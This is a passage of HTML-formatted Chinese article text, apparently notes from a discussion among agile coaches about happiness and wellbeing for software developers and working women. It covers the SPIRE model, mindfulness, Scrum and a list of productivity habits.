&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 职业女性，面临双重压力，如何获得更多幸福？工作，不想输给别人；还要把家庭生生的扛起来。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 现在回想：要对自己好一点，放过自己一点，不要对自己期待那么高。兼顾两方面是对自己苛责了一点，放宽一点。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 幸福是有方法的。SPIRE是幸福的系统方法，排解自己，找到真正的方向，找到心中真正想要做的热爱，能调整好自己，系统调整自己的方法；</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 敏捷教练的感悟。世界上没有那么多不得已，我们必须做这个，我不得不做这个，我一定要做这个，否则我就巴拉巴拉。你当时觉得接受不了，觉得“</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">我现在就处在这个角落，我就必须得做这个”</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">，但是回头想一想，你还是有很多选择的，只是你要去分析一下哪个是你真正想要的，更长远的东西。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">你不是有那么多由不得以，你的命运还是掌握在你手里，你如果有方法，你找到了应该花心思去奉献、去呵护的东西，你的人生会很不一样</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Michelle</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：细水长流，我比原来有点进步就可以</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">美国老人不帮忙带小孩。抚养孩子，还要全职工作，职场女性工作、生活的压力更大。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">放宽一点点，不要额外增加压力。对自己好一点，允许自己做个正常人。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">不要追求完美，标准放低，差不多就可以，good
enough就可以了。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">工作上允许自己慢一点，生活有其他的优先级，可以让工作慢下一点。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">保持身心健康，留下青山在。不要烙下病，想干也干不动了。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">可以细水长流，不要跟别人去比较，不要14小时都去工作，要允许自己进步慢一点，先想清楚什么是最重要的，我和自己去比较，我比原来有点进步就可以，这样</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">自己给自己增加的压力</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">就会</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">减少</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">很多。<o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;">话题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:#1E4E79;mso-font-kerning:18.0pt;">3</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">：如何码上幸福</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">阿芹：对码农建议<o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 【针对<strong>虚拟</strong>】</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:
0pt;">增加真实关系的接触，真实的和朋友在一起，情感交互会很不一样</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;">。回到案主阿牛，研发工程师在虚拟的环境，需要面对面、眼神看到眼神、身体有接触的真实的关系。一千个网友不如一个面对面的朋友。人所需要积极的情绪体验，在积极的关系中更容易发生。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 【针对工作要求<strong>频繁迭代</strong>】心流是焦虑和无聊之间的平衡。能力有差距，就会焦虑；能力高于挑战，就会无聊、倦怠。迭代，会让人感觉怎么赶也赶不上，okr考核，kpi排名，这些现象都存在。清楚知道焦虑、无聊，接纳焦虑和无聊，接纳迭代产生的情绪。中间状态就是心流。内在生命的一种净化。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 【针对<strong>大量配合</strong>】人和人之间需要很多配合，需要大量配合，会议多，朋友圈没时间看，这些现状是每个职场人都在经受的。保持内在和谐和组织目标，需要提升心力。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">即使外在环境不好，我们还要依然淡定、从容，或者带着焦虑依然勇敢前行，把自己的能力保持在一个稳定的状态里面，不受外在的风风雨雨、迭代、冲撞、冲突、压力，不要像墙头草或者风筝一样，被拽来拽去的，觉得自己都零碎了</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。自己是一个完整的、有能量的、能够面对高配合度、高信息量的环境。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">要有心力，实现游刃有余</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">，否则会出现恶性事件。爱自己，要给自己缓冲期，休假 ，去大自然当中，让心回到身体里。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- 【针对<strong>思考多，痛苦多</strong>】正念，回到思考少的程度。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">不要活在过去的遗憾、未来的恐惧里</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。要活在当下，像孩子婴儿那样，探索外在世界，不要忘了自己的本性，回到正念状态，保持自己是完整的、少受干扰、能和环境良好互动的生命体。<o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">人在职场，</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">体会到做人的那种本自具足的喜悦</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">；不要成为做事的工具，共同做些改变，多一些觉察。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Michelle</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：幸福的方法</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Michell辅导过上千研发工作者，幸福是有方法的，例如泰勒·本·沙哈尔（Tal Ben-Shahar）的幸福之塔模型SPIRE，SPIRE旨在促进终身学习和幸福，有五方面：</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">- </span><strong><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;">Spiritual</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">：精神福祉。看到工作的意义。不管你在哪个级别，都要</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">看到工作的意义</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">。研发不仅仅是码农，不仅仅是螺丝钉，不是谁给钱我就干什么。你为什么做这样的工作？公司为什么做这个产品，为同事、公司、社会能带来什么？如果非常有意义感，可以升华，觉得自己的工作很伟大，有一群同行者在做，那么</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">意义感就很容易进入心流状态，充满了幸福感：很牛、很爽，感受特别好</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- <strong>Physical</strong>：身体福祉。很多人有郁抑的倾向，和身体状态有关系。要照料好自己，休息，recovery，运动产生多巴胺。工作再努力也要照顾好自己，至少睡觉，少刷手机，健身。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- <strong>Intellectual</strong>：心智福祉；心智，智力。我是不是比以前更好了，更棒了。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- <strong>Relational</strong>：关系福祉；程序员，和人要有交往，可以增加很多力量，关系很重要。有欣赏自己的老板、或同事、或伙伴。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- <strong>Emotional</strong>，情感福祉；允许自己有情绪，但不要去伤害别人。不要把自己变成机器，让自己不要有情感，这样会有一些问题，</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">光理性是对天性的折磨</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">，让自己不脆弱，也是堵塞了幸福的源泉。痛苦和积极的情绪，都是人的情绪。允许自己为人，允许自己有情绪，可以发泄，但不能伤害别人，要接纳自己的情绪。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.587037037037037" data-s="300,640" data-type="jpeg" data-w="1080" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=950e171f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyhhPCLuiaNZibiahBb74nculTDObs3SOfXeib1ibibGAjKib7bIgTI49St4QCmZGASlajIVvIlszauTC0oQ%2F640%3Fwx_fmt%3Djpeg"/></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Ivy荐书：《幸福的要素》<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">评论：为什么</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">Michelle, Lisa, </span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">阿芹的声音那么好听？天生的心理辅导专家，很亲和，很容易入心。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">水哥：为自己做事，让自己更好<o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">码农觉得自己无所不能，幸福；开发的软件客户</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">15</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">年后都坚决不换。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">加班要不苦，想要开心，要觉得每个晚上做事情是为我自己，不是为老板或其他人，我得到了提升，代码更好、效率更高，团队很高的成就感。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">凡事往自己提升的方向去想</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">，而不是总去找外面不爽的事情。多找好的、开心的因素。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">水哥徒弟：“啥都没学到，就学到怎么把事情做好？”</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Lisa</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">SCRUM</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;">让自适应团体能量迸发，让从业者幸福快乐</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- 为什么喜欢敏捷教练？里面领域多，是很欣赏、热衷的领域，一直一腔热情。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- 敏捷表面上，是方法论，把工作切小，快速迭代，实现价值，让价值更快浮现。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- Jeff Sutherland，原是生物统计学教授，SCRUM正是基于生物进化理论，</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">找到复杂自适应团体能量迸发点所在</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。每个人，能不能找到自己的迸发点？迭代容易让你看到成果，激发你的能力。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- SCRUM是关于能量管理的过程。一般方法论是提高20%，SCRUM能提升10倍，内在的能量是不一样的，</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:
0pt;">内在能量的外在表现是从业者是否幸福、快乐</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- 内心有passion，找到热爱、成就感、开心，公司的人也会觉得开心，自己和周围的人都开心。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">- 敏捷从业者，是让更多人的有更好的状态，更好的绩效，更多</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:
0pt;">领导者要更多地支持、成就员工</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">，员工迸发的能量会有更大的益处，更好、更宽松的环境
很重要。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">评论：Lisa进入passion模式，光彩照人<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">让知识工作者更幸福。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;">话题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:#1E4E79;mso-font-kerning:18.0pt;">4</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">：基本功、新技术和幸福的关系</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">水哥：普适的十宝箱<o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">1、打字必须练好<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">打字是职场人的最基础技能<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">2、印象笔记用起来：<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">保存网上资料、每日PDCA日志、随时记录各种信息<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">3、</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">泳道图是日常工作超级神器</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">：<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">各种对外、对外场合都极为适用，一图胜千言<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">4、电脑至少双屏<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">工作效率提高不是一点点<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">5、日常工作完全遵循PDCA模式<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">6、TOC法则<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">一次只解决当下最大的一个瓶颈<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">7、第一性原理<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">第一性原理是一种科学思维方法，用于解决问题或设计新事物。它是从基本原则出发，经过推理和推导，得出最基础的结论的方法。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
